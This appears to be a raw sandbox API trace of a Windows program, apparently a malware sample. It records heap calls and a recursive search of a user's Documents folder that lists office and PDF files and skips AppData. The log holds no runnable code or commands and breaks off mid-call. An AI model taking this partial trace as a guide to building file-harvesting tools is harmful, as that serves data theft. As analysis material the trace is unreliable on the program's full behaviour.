HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.410] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.411] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d462660, ftCreationTime.dwHighDateTime=0x1d5da18, ftLastAccessTime.dwLowDateTime=0x31badc20, ftLastAccessTime.dwHighDateTime=0x1d5e09b, ftLastWriteTime.dwLowDateTime=0x31badc20, ftLastWriteTime.dwHighDateTime=0x1d5e09b, nFileSizeHigh=0x0, nFileSizeLow=0xde49, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="uS __ 9ClmNKU6A.odt", cAlternateFileName="US__9C~1.ODT")) returned 1 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1cc0 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dd0 [0157.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dd0 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1eb0 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8e2a80 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ec0 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8a0 [0157.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ed0 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ec0 | out: hHeap=0x8a0000) returned 1 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8a0 | out: hHeap=0x8a0000) returned 1 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ed0 | out: hHeap=0x8a0000) returned 1 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8e8 | out: hHeap=0x8a0000) returned 1 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dd0 | out: hHeap=0x8a0000) returned 1 [0157.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0157.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1eb0 | out: hHeap=0x8a0000) returned 1 [0157.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1eb0 [0157.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0157.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8d0 [0157.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1cc0 [0157.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1cc0 | out: hHeap=0x8a0000) returned 1 [0157.413] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb702510, ftCreationTime.dwHighDateTime=0x1d5d9dc, ftLastAccessTime.dwLowDateTime=0x2ad3e090, ftLastAccessTime.dwHighDateTime=0x1d5dc0a, ftLastWriteTime.dwLowDateTime=0x2ad3e090, ftLastWriteTime.dwHighDateTime=0x1d5dc0a, nFileSizeHigh=0x0, nFileSizeLow=0xce08, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="XdF9hOa.pdf", cAlternateFileName="")) returned 1 [0157.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba8e8 [0157.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba8d0 | out: hHeap=0x8a0000) returned 1 [0157.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0157.413] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaf22dc0, ftCreationTime.dwHighDateTime=0x1d5e632, ftLastAccessTime.dwLowDateTime=0x179d67e0, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0x179d67e0, ftLastWriteTime.dwHighDateTime=0x1d5debb, nFileSizeHigh=0x0, nFileSizeLow=0xea9a, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="XjtJup63.pdf", cAlternateFileName="")) returned 1 [0157.413] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb965a80, ftCreationTime.dwHighDateTime=0x1d5e7d4, ftLastAccessTime.dwLowDateTime=0xce344270, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xce344270, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0xa1d4, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ZAkF0mR.pps", cAlternateFileName="")) returned 1 [0157.413] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x12a006a, ftCreationTime.dwLowDateTime=0x4138, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0xec006b, nFileSizeHigh=0x4138, nFileSizeLow=0x8e2ba0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="ZA\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.414] FindClose (in: hFindFile=0x90af18 | out: hFindFile=0x90af18) returned 1 [0157.415] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6c9e910, ftCreationTime.dwHighDateTime=0x1d5c7ef, ftLastAccessTime.dwLowDateTime=0x1307fcf0, ftLastAccessTime.dwHighDateTime=0x1d56638, ftLastWriteTime.dwLowDateTime=0x1307fcf0, ftLastWriteTime.dwHighDateTime=0x1d56638, nFileSizeHigh=0x0, nFileSizeLow=0x12a51, dwReserved0=0x8a7364, dwReserved1=0x8a7560, cFileName="LVw QC5rO32Oh.pptx", cAlternateFileName="LVWQC5~1.PPT")) returned 1 [0157.415] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f6963d0, ftCreationTime.dwHighDateTime=0x1d5e41e, ftLastAccessTime.dwLowDateTime=0x20c90830, ftLastAccessTime.dwHighDateTime=0x1d5dc39, ftLastWriteTime.dwLowDateTime=0x20c90830, ftLastWriteTime.dwHighDateTime=0x1d5dc39, nFileSizeHigh=0x0, nFileSizeLow=0xfe17, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="mV3Nzu4vWV4hC.xls", cAlternateFileName="MV3NZU~1.XLS")) returned 1 [0157.415] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0157.415] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.415] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Music", cchCount1=8, lpString2="AppData", cchCount2=7) returned 3 [0157.415] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x8e2af0, ftCreationTime.dwLowDateTime=0x9ba8b8, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x8960278, nFileSizeHigh=0x4018, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.415] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8a7560, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0157.416] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.416] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Pictures", cchCount1=11, lpString2="AppData", cchCount2=7) returned 3 [0157.416] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.416] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x8e2af0, ftCreationTime.dwLowDateTime=0x9ba8a0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x9ba00e, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x8960278, nFileSizeHigh=0x4041, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0xffffffff [0157.416] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x87eb3c, dwReserved1=0x8a7560, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0157.416] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0157.424] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Shapes", cchCount1=9, lpString2="AppData", cchCount2=7) returned 3 [0157.424] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.424] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90af18 [0157.430] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.430] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e630 | out: lpFindFileData=0x87e630*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x2020e02, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.430] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.430] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.430] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.430] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.431] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.431] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.431] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.431] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] FindNextFileW (in: hFindFile=0x90af18, lpFindFileData=0x87e618 | out: lpFindFileData=0x87e618*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="_private", cAlternateFileName="")) returned 1 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0157.432] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0157.432] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.432] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName=".", cAlternateFileName="")) returned 0x90afd8 [0157.435] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="..", cAlternateFileName="")) returned 1 [0157.435] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3d8 | out: lpFindFileData=0x87e3d8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x4, dwReserved1=0x8a7560, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] FindNextFileW (in: hFindFile=0x90afd8, lpFindFileData=0x87e3c0 | out: lpFindFileData=0x87e3c0*(dwFileAttributes=0x14c0058, ftCreationTime.dwLowDateTime=0x4234, ftCreationTime.dwHighDateTime=0x89fe58, ftLastAccessTime.dwLowDateTime=0x773d1ecd, ftLastAccessTime.dwHighDateTime=0x7e8b71, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x1440059, nFileSizeHigh=0x4234, nFileSizeLow=0x909410, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="鞠麿\x08", cAlternateFileName="\x8d\x87ဓ+\x10")) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0157.436] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 